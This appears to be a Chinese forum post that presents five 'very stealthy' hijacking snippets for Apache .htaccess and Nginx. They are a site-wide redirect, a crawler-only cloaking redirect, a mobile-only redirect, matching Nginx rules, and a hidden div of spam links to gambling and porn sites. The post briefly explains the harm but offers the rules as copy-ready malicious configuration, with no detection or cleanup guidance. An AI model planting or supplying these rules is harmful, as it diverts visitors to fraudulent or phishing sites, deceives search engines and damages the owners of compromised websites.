五种htaccess劫持代码(Apache专用,非常隐蔽)
htaccess劫持,本质是利用 Apache 服务器的 .htaccess 配置文件(URL 重写功能)实现的恶意 / 违规操作,而合理使用htaccess 则是做合法的 URL 重写、域名跳转等,htaccess劫持(也常叫 URL 劫持、域名劫持),是攻击者通过篡改网站的htaccess 文件,写入恶意重写规则,达到以下目的,流量劫持、把访问你网站的用户偷偷跳转到攻击者的恶意网站(比如b彩、钓鱼站),
SEO 劫持、让搜索引擎抓取你网站时,解析到攻击者的内容,窃取你的网站权重,
内容劫、把你网站的特定页面(比如首页、高流量页面)重定向到其他地址,篡改用户看到的内容,
简单说:合法使用是 “自己控制自己的域名跳转”,劫持是 “别人篡改你的配置,把你的流量 / 内容偷走,1、全站301跳转代码2、只劫持蜘蛛(搜索引擎看到是指定网址,访客正常)代码3、只劫持手机端代码4、Nginx 配置劫持代码(nginx.conf/vhost 配置)5、暗链 / 隐藏广告劫持代码(不跳转,但挂黑链降权)代码
1、全站301跳转
RewriteEngine On
RewriteRule ^(.*)$ http://指定网址/$1
2、只劫持蜘蛛(搜索引擎看到是指定网址,访客正常)
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (baiduspider|googlebot|sogou|360spider)
RewriteRule ^(.*)$ http://指定网址/$1
3、只劫持手机端
RewriteCond %{HTTP_USER_AGENT} (android|iphone|ipad|mobile)
RewriteRule ^(.*)$ http://指定网址
4、Nginx 配置劫持(nginx.conf/vhost 配置)
if ($http_user_agent ~* (baiduspider|googlebot)) {
return 301 http://指定网址;
}
if ($http_user_agent ~* (mobile|android|iphone)) {
return 301 http://指定网址;
}
5、暗链 / 隐藏广告劫持(不跳转,但挂黑链降权)
<div style=”display:none;position:absolute;left:-9999px;top:-9999px”>
<a href=”b彩/s情/指定网址”>…</a>
</div>
页:
[1]